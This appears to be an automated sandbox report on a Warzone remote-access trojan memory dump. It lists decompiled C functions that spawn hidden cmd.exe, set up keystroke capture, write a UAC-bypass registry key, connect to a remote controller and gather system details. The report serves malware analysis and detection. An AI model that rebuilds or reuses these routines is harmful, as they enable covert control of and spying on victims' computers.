                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$Initialize
                                  • String ID: Grabber$Source$vids
                                  • API String ID: 1108742289-4200688928
                                  • Opcode ID: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction ID: c707b6f7033061667e34d12cbb2bfaee6e47a2410d4a0b7bdeab57eb5d8e2362
                                  • Opcode Fuzzy Hash: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction Fuzzy Hash: 1C518A71600200AFDF14DF64C885E9A3BB6BF89715B2041ADFD05AF291CB79ED85CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00407A8E(void* __eflags) {
                                  				char _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v100;
                                  				CHAR* _t27;
                                  
                                  				_v8 = 0;
                                  				E00410CFF( &_v8);
                                  				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                  				GetWindowsDirectoryA(_t27, 0x104);
                                  				E0040102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
                                  				E00401052( &_v100, 0, 0x44);
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
                                  					return E00410CD8(_v8);
                                  				}
                                  				Sleep(0x3e8);
                                  				return _v24.dwProcessId;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x00407a9c, 0x00407a9f, 0x00407ab7, 0x00407abf, 0x00407ad6, 0x00407ae2, 0x00407aec, 0x00407af0, 0x00407af1, 0x00407af2, 0x00407b0f, 0x00000000, 0x00407b24, 0x00407b16, 0x00000000

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                  • Sleep.KERNEL32(000003E8), ref: 00407B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 2560724043-2003734499
                                  • Opcode ID: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction ID: 526d35256bd352fe19e6f9b51bef16261156da3b9883bb0cb5aadd8e9d8f3863
                                  • Opcode Fuzzy Hash: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction Fuzzy Hash: E51170B1A4430DBBE710A7A9CC86FEF767CEB04748F000036F206B6191DA74AE0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040906F(char _a4, intOrPtr _a8) {
                                  				void _v28;
                                  				void* _t13;
                                  				signed int _t14;
                                  
                                  				InitializeCriticalSection( &_v28);
                                  				_t14 = 6;
                                  				DeleteCriticalSection(memcpy(0x55a808,  &_v28, _t14 << 2));
                                  				EnterCriticalSection(0x55a808);
                                  				_t5 =  &_a4; // 0x402f48
                                  				 *0x55a830 =  *_t5;
                                  				GetModuleHandleA(0);
                                  				 *0x42675c = 0x559de0;
                                  				if(_a8 == 0) {
                                  					E00401F98(0x55a854);
                                  					 *0x559de0 = 1;
                                  					_t13 = E00401F6D(0x55a84c, E00408D0F, 0x559de0);
                                  				} else {
                                  					_t13 = E00401F6D(0x55a854, E00407F94, 0x559de0);
                                  					 *0x55a7f4 = 1;
                                  				}
                                  				LeaveCriticalSection(0x55a808);
                                  				return _t13;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x0040907b, 0x00409083, 0x00409092, 0x0040909e, 0x004090a4, 0x004090a9, 0x004090ae, 0x004090bd, 0x004090c8, 0x004090e1, 0x004090f1, 0x004090fb, 0x004090ca, 0x004090d0, 0x004090d5, 0x004090d5, 0x00409101, 0x0040910a

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                  • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                  • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                  • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                  • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                    • Part of subcall function 00401F6D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                  • String ID: H/@
                                  • API String ID: 2964645253-3842538647
                                  • Opcode ID: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction ID: f99a12277a3120933ea65728b4e70e144b28dbd7bebc7df26f1967f06ae464e9
                                  • Opcode Fuzzy Hash: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction Fuzzy Hash: 9D017131A04205ABCB10AB65EC19BDB3FB9FB44716F00413BFA05A72D1C779544ACB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040910D() {
                                  				intOrPtr _t1;
                                  
                                  				_t1 = 5;
                                  				 *0x55a804 = _t1;
                                  				 *0x559dec = 0;
                                  				 *0x55a7fc = _t1;
                                  				 *0x55a800 = 0;
                                  				E004018C7(0x55a7f8, 0);
                                  				InitializeCriticalSection(0x55a808);
                                  				E004113ED(0x55a834, 0);
                                  				asm("xorps xmm0, xmm0");
                                  				 *0x55a820 = 0;
                                  				asm("movups [0x55a84c], xmm0");
                                  				 *0x55a830 = 0;
                                  				_t19 = LoadLibraryW(L"User32.dll");
                                  				_push(0x55a834);
                                  				 *0x55a824 = E00411E88(_t4, "GetRawInputData", 0);
                                  				 *0x55a82c = E00411E88(_t19, "ToUnicode", 0);
                                  				 *0x55a828 = E00411E88(_t19, "MapVirtualKeyA", 0);
                                  				return 0x559de0;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x00409110, 0x00409113, 0x0040911d, 0x00409123, 0x00409128, 0x0040912e, 0x00409138, 0x00409143, 0x00409148, 0x0040914b, 0x00409156, 0x0040915d, 0x00409169, 0x00409170, 0x0040917d, 0x0040918e, 0x0040919b, 0x004091a6

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                  • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                  • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                  • API String ID: 4274177235-2474467583
                                  • Opcode ID: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                  • Opcode Fuzzy Hash: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00412E2C(void* __ecx, char* _a4, CHAR* _a8) {
                                  				void* _v8;
                                  				long _t9;
                                  				int _t12;
                                  				int _t15;
                                  				long _t16;
                                  
                                  				_t15 = lstrlenA(_a8);
                                  				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
                                  				if(_t9 == 0) {
                                  					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
                                  					RegCloseKey(_v8);
                                  					if(_t16 == 0) {
                                  						_t12 = 1;
                                  					} else {
                                  						_push(_t16);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					_push(_t9);
                                  					L2:
                                  					SetLastError();
                                  					_t12 = 0;
                                  				}
                                  				return _t12;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x00412e3a, 0x00412e51, 0x00412e59, 0x00412e7d, 0x00412e7f, 0x00412e87, 0x00412e8c, 0x00412e89, 0x00412e89, 0x00000000, 0x00412e89, 0x00412e5b, 0x00412e5b, 0x00412e5c, 0x00412e5c, 0x00412e62, 0x00412e62, 0x00412e90

                                  APIs
                                  • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                  • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                  • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                  • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorLastOpenValuelstrlen
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1613093083-2536721355
                                  • Opcode ID: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction ID: ffd4354489f07140ccd769c490119bd97119082caabcfac067ebab19d0d729b9
                                  • Opcode Fuzzy Hash: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction Fuzzy Hash: 0BF0CD35540318BBDF211FA09D09FDB3F79AB09790F108160F902A6160C2B58A61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040F238(intOrPtr _a4) {
                                  				intOrPtr* _t2;
                                  				_Unknown_base(*)()* _t8;
                                  				struct HINSTANCE__* _t10;
                                  
                                  				_t2 =  *0x55adb8;
                                  				if(_t2 == 0) {
                                  					L2:
                                  					_t10 = GetModuleHandleW(L"ntdll.dll");
                                  					 *0x55adb8 = GetProcAddress(_t10, "RtlNtStatusToDosError");
                                  					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
                                  					_t2 =  *0x55adb8;
                                  					 *0x55ad94 = _t8;
                                  				} else {
                                  					_t8 =  *0x55ad94;
                                  					if(_t8 == 0) {
                                  						goto L2;
                                  					}
                                  				}
                                  				if(_t2 != 0 && _t8 != 0) {
                                  					return  *0x55ad94( *_t2(_a4));
                                  				}
                                  				return _t2;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x0040f23b, 0x0040f242, 0x0040f24e, 0x0040f25a, 0x0040f26e, 0x0040f279, 0x0040f27b, 0x0040f280, 0x0040f244, 0x0040f244, 0x0040f24c, 0x00000000, 0x00000000, 0x0040f24c, 0x0040f289, 0x00000000, 0x0040f295, 0x0040f29c

                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,0040FC57,00000000), ref: 0040F262
                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,0040FC57,00000000), ref: 0040F273
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                  • API String ID: 667068680-2897241497
                                  • Opcode ID: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction ID: fa32091ee75a1baed7f6170c370dd1564c17c489402f95e3a669c5805b8ffe79
                                  • Opcode Fuzzy Hash: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction Fuzzy Hash: F6F0B4342443005FDB106F64FC289BA3BB8AE94B53300013EF806D3B60DB79DC499A19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040594B(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				void _v40;
                                  				void* _t36;
                                  				signed int _t40;
                                  				signed int _t42;
                                  				void* _t44;
                                  				signed int _t47;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				signed int* _t55;
                                  
                                  				_v8 = _v8 & 0x00000000;
                                  				_t44 = __ecx;
                                  				E00403237(__ecx,  &_a4);
                                  				 *((intOrPtr*)(_t44 + 4)) = _a8;
                                  				E0041178E(_t44 + 0x1d8);
                                  				_t47 = 8;
                                  				memset( &_v40, 0, _t47 << 2);
                                  				_v28 = 6;
                                  				_t36 =  &_v40;
                                  				_t53 = 1;
                                  				_v32 = 1;
                                  				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
                                  				if(_t36 != 0) {
                                  					L4:
                                  					_t53 = 0;
                                  				} else {
                                  					_t54 =  *((intOrPtr*)(_v8 + 0x18));
                                  					_t40 = 2;
                                  					__imp__#23(_t40, 1, 0);
                                  					 *(_t44 + 0xc) = _t40;
                                  					if(_t40 == 0xffffffff) {
                                  						goto L4;
                                  					} else {
                                  						_t55 = _t44 + 0x1c8;
                                  						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
                                  						_t42 = 2;
                                  						 *_t55 = _t42;
                                  						__imp__#9(_a8);
                                  						 *(_t44 + 0x1ca) = _t42;
                                  						__imp__freeaddrinfo(_v8);
                                  						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
                                  						if(_t42 != 0xffffffff) {
                                  							 *((intOrPtr*)(_t44 + 8)) = 1;
                                  							ReleaseMutex( *(_t44 + 0x1d8));
                                  						} else {
                                  							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
                                  							goto L4;
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_a4);
                                  				return _t53;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x00405951, 0x0040595c, 0x0040595e, 0x0040596c, 0x0040596f, 0x00405976, 0x0040597c, 0x00405981, 0x00405989, 0x00405994, 0x00405995, 0x00405998, 0x004059a0, 0x004059ff, 0x004059ff, 0x004059a2, 0x004059aa, 0x004059ad, 0x004059af, 0x004059b5, 0x004059bb, 0x00000000, 0x004059bd, 0x004059c0, 0x004059c8, 0x004059ce, 0x004059d2, 0x004059d5, 0x004059de, 0x004059e5, 0x004059f1, 0x004059fa, 0x00405a18, 0x00405a1b, 0x004059fc, 0x004059fc, 0x00000000, 0x004059fc, 0x004059fa, 0x004059bb, 0x00405a04, 0x00405a0f

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,74A313FB,?,?,00000000,00404FB9,?,?,?,?,?,00000000,74A313FB), ref: 00411792
                                  • getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                  • htons.WS2_32(00000000), ref: 004059D5
                                  • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                  • connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                  • String ID:
                                  • API String ID: 2516106447-0
                                  • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                  • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040C30D(WCHAR* __ecx, void** __edx, long* _a4) {
                                  				void** _v8;
                                  				long _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				long* _t14;
                                  				long _t16;
                                  				void* _t17;
                                  				long* _t24;
                                  				void* _t32;
                                  				struct _OVERLAPPED* _t34;
                                  				void* _t36;
                                  
                                  				_t34 = 0;
                                  				_v8 = __edx;
                                  				_t36 =  *0x42696c - _t34; // 0x0
                                  				if(_t36 == 0) {
                                  					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
                                  					if(_t32 != 0 && _t32 != 0xffffffff) {
                                  						_t14 =  &_v20;
                                  						__imp__GetFileSizeEx(_t32, _t14);
                                  						if(_t14 != 0 && _v16 == 0) {
                                  							_t16 = _v20;
                                  							_t24 = _a4;
                                  							 *_t24 = _t16;
                                  							_t17 = LocalAlloc(0x40, _t16);
                                  							 *_v8 = _t17;
                                  							if(_t17 != 0) {
                                  								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
                                  									LocalFree( *_v8);
                                  								} else {
                                  									_t34 = 1;
                                  								}
                                  							}
                                  						}
                                  						CloseHandle(_t32);
                                  					}
                                  				} else {
                                  					_t34 = E0040C3B9(__ecx, __edx, _a4);
                                  				}
                                  				return _t34;
                                  			}
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C341
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C38A
                                  • CloseHandle.KERNEL32(00000000), ref: 0040C3AD
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 4225742195-0
                                  • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                  • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040577F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v36;
                                  				char _v44;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v65600;
                                  				void* _t47;
                                  				char* _t54;
                                  				intOrPtr _t79;
                                  				void* _t85;
                                  				void* _t88;
                                  				void* _t89;
                                  				void* _t114;
                                  				char* _t115;
                                  				char _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  				void* _t120;
                                  
                                  				_t114 = __edx;
                                  				_t89 = __ecx;
                                  				_t47 = E004011C0(0x10040, __ecx);
                                  				_t88 = _t89;
                                  				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
                                  					_v28 = 0xea60;
                                  					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
                                  					_t117 = 0;
                                  					E00401052( &_v65600, 0, 0xffff);
                                  					_t120 = _t119 + 0xc;
                                  					_v60 = 0;
                                  					_v56 = 0;
                                  					E00403115( &_v52, _t114, E004034D1( &_v12, "warzoneTURBO"));
                                  					E00405FEB(_v12);
                                  					_v24 = 0;
                                  					_v20 = 0;
                                  					while(1) {
                                  						_t54 =  &_v65600;
                                  						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117);
                                  						_t115 = _t54;
                                  						if(_t115 != 0xc) {
                                  							goto L8;
                                  						}
                                  						_v16 = _t117;
                                  						_t106 =  &_v16;
                                  						_v12 = _t117;
                                  						E004030CC( &_v16,  &_v65600, _t54);
                                  						_t107 = _t120;
                                  						E0040315E(_t120,  &_v16);
                                  						E0040315E(_t120,  &_v52);
                                  						E004061F0( &_v44, _t114, _t120, _t107,  &_v16, _t106);
                                  						_t120 = _t120 + 0x10;
                                  						_t79 =  *((intOrPtr*)(_v44 + 4));
                                  						_t118 = _t79 + 0xc;
                                  						if(_t79 == 0 || _t118 == _t115) {
                                  							L7:
                                  							E00403148( &_v44);
                                  							E00403148( &_v16);
                                  							L9:
                                  							_t96 =  &_v24;
                                  							E004030CC( &_v24,  &_v65600, _t115);
                                  							_t97 = _t120;
                                  							E0040315E(_t120,  &_v24);
                                  							E0040315E(_t120,  &_v52);
                                  							E004061F0( &_v36, _t114, _t120, _t97,  &_v24, _t96);
                                  							_t120 = _t120 + 0x10;
                                  							E004030FE(_t88 + 0x10);
                                  							E004030CC(_t88 + 0x10, _v36, _t115);
                                  							E004030FE( &_v24);
                                  							E004030FE( &_v36);
                                  							E0040507E(_t88, _t114, _a4);
                                  							E00403148( &_v36);
                                  							if(_t115 <= 0) {
                                  								goto L12;
                                  							}
                                  							_t117 = 0;
                                  							continue;
                                  						} else {
                                  							while(1) {
                                  								_t85 =  &_v65600 + _t115;
                                  								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
                                  								if(_t85 == 0xffffffff) {
                                  									break;
                                  								}
                                  								_t115 = _t115 + _t85;
                                  								if(_t118 != _t115) {
                                  									continue;
                                  								}
                                  								goto L7;
                                  							}
                                  							E00403148( &_v44);
                                  							E00403148( &_v16);
                                  							L12:
                                  							E00403148( &_v24);
                                  							E00403148( &_v52);
                                  							return E00403148( &_v60);
                                  						}
                                  						L8:
                                  						if(_t115 == 0xffffffff) {
                                  							goto L12;
                                  						}
                                  						goto L9;
                                  					}
                                  				}
                                  				return _t47;
                                  			}
                                  APIs
                                  • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                  • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                  • String ID: `$warzoneTURBO
                                  • API String ID: 3973575906-3455775371
                                  • Opcode ID: a3680666d4698ede3643cffe89399fc26e680efdcabfa74173f1fee4127a171c
                                  • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                  • Opcode Fuzzy Hash: a3680666d4698ede3643cffe89399fc26e680efdcabfa74173f1fee4127a171c
                                  • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00402E27(char __ecx, void* __edx, void* __eflags) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v76;
                                  				char _v344;
                                  				short _v864;
                                  				void* __edi;
                                  				void* _t28;
                                  				void* _t32;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t37;
                                  				char _t54;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t84;
                                  
                                  				_t84 = __eflags;
                                  				_t54 = __ecx;
                                  				_t76 = __edx;
                                  				E00410D2D(E00410E5E( &_v24, __edx),  &_v20);
                                  				GetModuleFileNameA(0,  &_v344, 0x104);
                                  				_v16 = 0;
                                  				_t28 = E004134A2( &_v344,  &_v16);
                                  				_v12 = 0;
                                  				E00413279(_t28, _v16, 0x10ad,  &_v12);
                                  				_t82 = _t81 + 4;
                                  				E004036F7(_t82, _v20);
                                  				E004036F7(_t82, _v24);
                                  				_t32 = E00410F3E();
                                  				E004036F7(_t82, 0x417668);
                                  				_t64 = _t82;
                                  				E0041119D(_t82);
                                  				_t35 = E00411177(_t82);
                                  				_t36 = E0041111B();
                                  				_t37 = E00410F61();
                                  				E004111D7(_t82, _v16);
                                  				E00405044(_t54, E0040430E( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
                                  				E004042CC( &_v76, _t76);
                                  				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
                                  					E00401052( &_v864, 0, 0x208);
                                  					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
                                  					lstrcatW( &_v864, L"\\Microsoft Vision\\");
                                  					CreateDirectoryW( &_v864, 0);
                                  					E0040906F(_t54, 1);
                                  					_v12 = 0x41a8b0;
                                  					E00405044(_t54,  &_v12);
                                  				}
                                  				E00405FEB(_v20);
                                  				return E00405FEB(_v24);
                                  			}
                                  APIs
                                    • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                    • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                    • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                    • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
